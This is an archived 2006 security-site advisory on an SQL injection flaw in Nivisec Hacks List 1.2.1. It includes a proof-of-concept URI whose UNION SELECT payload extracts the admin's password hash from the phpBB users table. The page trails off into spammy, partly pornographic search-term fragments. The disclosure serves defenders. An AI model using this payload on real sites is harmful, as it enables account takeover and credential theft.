about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Nivisec Hacks List HACK_ID SQL Injection Vulnerability


Title Nivisec Hacks List HACK_ID SQL Injection Vulnerability
Published 2006-11-26-12:00AM
Updated 2006-11-28-09:40PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  the master is credited with the discovery of this vulnerability.
Vulnerable  Nivisec Hacks List 1.2.1
Not Vulnerable  
Code   An attacker can exploit this issue via a web client.

The following prof-of-concept URI is available:

http://example.com/admin/admin_hacks_list.php?mode=edit&hack_id=-99%20UNION%20SELECT%20null,null,user_password,null,null,null,null,null,null,null,null,null%20FROM%20phpbb_users%20Where%20user_id=2&sid=AdminHash
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Wed, 16 Dec 2009 22:20:29 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
php-nuke a www.nikepi remote fil 2...n.com/ www.teenfo webmin sca www.58084. includes%2 Anemalsex. sexarabfre Sexygirl.c xxx sexy 2...n.com/ SMF Jagm www.tamila 2...n.com/ WWW.Slaz Sexygirl.c maxcpm.inf Sabdrimer 2...n.com/ www.ajlcn. news for c cuteftp 2...n.com/ mumyfiraun 2900 2...n.com/ news for c 123CLIPS Xx . Cex 2...n.com/ www.playbo board.php A...2FDevi 2...n.com/ karina &a desipapa&a SEXS Pinklips old women www.desiba 2...n.com/ Video porn sex-video. php 4.2 2...n.com/ fluidsim